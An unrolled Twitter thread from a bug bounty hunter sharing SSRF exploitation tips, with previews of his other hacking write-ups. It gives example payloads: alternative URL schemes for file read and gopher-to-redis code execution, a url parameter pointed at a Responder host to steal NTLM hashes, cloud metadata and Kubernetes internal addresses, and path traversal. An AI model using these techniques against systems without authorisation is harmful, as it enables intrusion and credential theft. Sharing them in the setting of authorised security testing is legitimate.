Share this page!

Enter Twitter Thread URL to Unroll

Needs to be the full URL like: https://twitter.com/threadreaderapp/status/1644127596119195649

How to get URL link on Twitter App

  1. On the Twitter thread, click on or icon on the bottom
  2. Click again on or Share Via icon
  3. Click on Copy Link to Tweet
  4. Paste it above and click "Unroll Thread"!
  5. More info at Twitter Help
Corben Leo Profile picture
@hacker_
Aug 24 13 tweets 3 min read Twitter logo Read on Twitter
I've made $500k+ from SSRF vulnerabilities.

Here are my tricks: Image
1. Try other URL schemes:

• file:// (file read)
• netdoc:// (file read)
• dict://
• gopher://
• jar://
• ldap://
• and more!

You might be able to get file read.

Or send multi-line requests to gain additional impact

(Ex: gopher + redis = likely RCE)
2. Is the target running Windows?

Can't hit internal services?

(Well, try this even if you can)

Try to steal NTLM hashes with Responder.

/vulnerable?url=http://your-responder-host Image
3. Try alternative representations of IP addresses.

IPs can be represented in many ways including:

• octal
• decimal
• hexadecimal
• etc.

Try different representations.

You might get lucky. Image
4. Can't hit 169.254.169.254?

On AWS, "instance-data" resolves to the metadata server.

Try hitting http://instance-data instead.
5. Know your target's technologies.

Look at job postings!

You might not be able to hit a meta-data service.

But there are likely other internal services!

(ex: I've pulled data from an internal Elasticsearch instance)
6. Are they using Kubernetes?

Search Burp history for ".default.svc" or ".cluster.local"

If you find references, try to hit them.

Also, try to hit the Kubernetes API: https://kubernetes.default.svc Image
7. In Kubernetes, you should be brute-forcing for:

HOSTNAME.<some-namespace>.svc.cluster.local

I often use Burp Intruder: FUZZ.default.svc.cluster.local

Need better wordlists?

Scrape helm charts from ArtifactHub.
8. Can't supply a full URL? You can still get SSRF!

If your input is used to build a URL, THINK.

Learn about URL structures.

The following 4 characters have led to many SSRFs:

• @
• ?
• #
• ;

An example is in the picture: Image
9. If your injection is down the path, traverse!

GET /vulnerable?id=1234

|> app fetches: http://some-api/api/v1/1234

GET /vulnerable?id=../../

|> app fetches: http://some-api/api/v1/../../

Find an open redirect & you probably have SSRF.

Or likely can hit internal endpoints.
10. That's all I've got for you.

context is king.

use your brain.

do some research.
follow @hacker_ (and @boringmattress)

top:
@boringmattress also, check out some other tips that Justin covered last week:

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Corben Leo

Corben Leo Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @hacker_

Corben Leo Profile picture
Aug 21
I hacked a car company.

Here's how I gained access to hundreds of their codebases.
1. This company ran a bug bounty program.

I came across a web server that responded with:

> 404 Not Found: Requested route ('example.apps.███.com')
2. This is likely an ingress controller.

Seeing "404 Not Found" and

• the Host header reflected in the response
• The word "route" in the response

Made me believe it was.

What's an ingress controller?
Read 12 tweets
Corben Leo Profile picture
Jan 27
I hacked the military.

A system containing the information of military personnel.

Yet, the hack was done legally.

Here's how I did it and how it was done legally:
1. I came across an Army server running ASP .NET

The application was a Learning Management System (LMS).

If you’ve been in school in the past 10-15 years, you’ve likely used one: Moodle, Canvas, D2L, Blackboard, etc.

This LMS allowed anonymous registration.

So I registered!
2. I proxied my HTTP traffic through Burp Suite and started using the application.

I clicked every button, filled out forms, and even took a test.

Enumerating the site’s functionality.

The more you know about how an application works, the easier it is to find vulnerabilities.
Read 15 tweets
Corben Leo Profile picture
Jan 25
I hacked a car company last year.

I found a way to steal every customer's

• Name
• Email address
• Phone number
• Address

Here's how I did it:
1. I started with reconnaisance:

- Subdomain enumeration to find the company's subdomains.
- HTTP server probing to see what's online

$ subfinder -d example[dot]com | httpx -o target.httpx

I came across a webserver running IIS:

hxxps://installersupport.██████.com/
2. I wanted to know what files were on the host, without brute-forcing.

getallurls (gau) fetches known URLs from:

• AlienVault's Open Threat Exchange
• the Wayback Machine
• Common Crawl
• URLScan.

So I ran it against the domain:

$ gau installersupport.██████.com
Read 15 tweets
Corben Leo Profile picture
Jan 2
I hacked a large company (70k+ employees) through social engineering. Legally of course.

• I set up the infrastructure
• Scraped names & emails with LinkedIn
• Sent 200 phishing emails.

I had access to their AWS console within 2 minutes.

And much more:
1/ I used Evilnginx2 to bypass MFA (Okta & Duo)

From Okta, I could access Outlook, Sharepoint, Github, & many more services on behalf of the 50+ employees that fell for the phish.

I was blown away by how easy it was to pull off this "hack" that could've impacted 60M+ people.
2/ Phishing attacks are on the rise and are becoming more sophisticated.

Last year we saw Uber, Dropbox, Twilio, Axie Infinity ($625M theft), and more compromised through phishing.

People argue that humans are the "weakest link", yet, companies of all sizes still rely on:
Read 8 tweets
Corben Leo Profile picture
Dec 31, 2022
My favorite hacking stories of 2022:
1/ Hacking a Trans-Atlantic cable.

2/ Hacking a gaming company:

Read 12 tweets
Corben Leo Profile picture
Nov 25, 2022
I hacked a phone company earlier last year.

I found a stupidly simple way to view the call logs of 50M customers.

Here's how I did it:
1/ I've been in this bug bounty program for quite some time.

I previously bought a phone plan so I could login and test functionality as an authenticated user.

In the dashboard, there was a tab to view your call logs.
2/ The URL contained a parameter called "subscriberId".

It contained a numerical ID, so obviously I tried to change it to another users.

Unfortunately, it didn't work.
Read 8 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

Send Email!

:(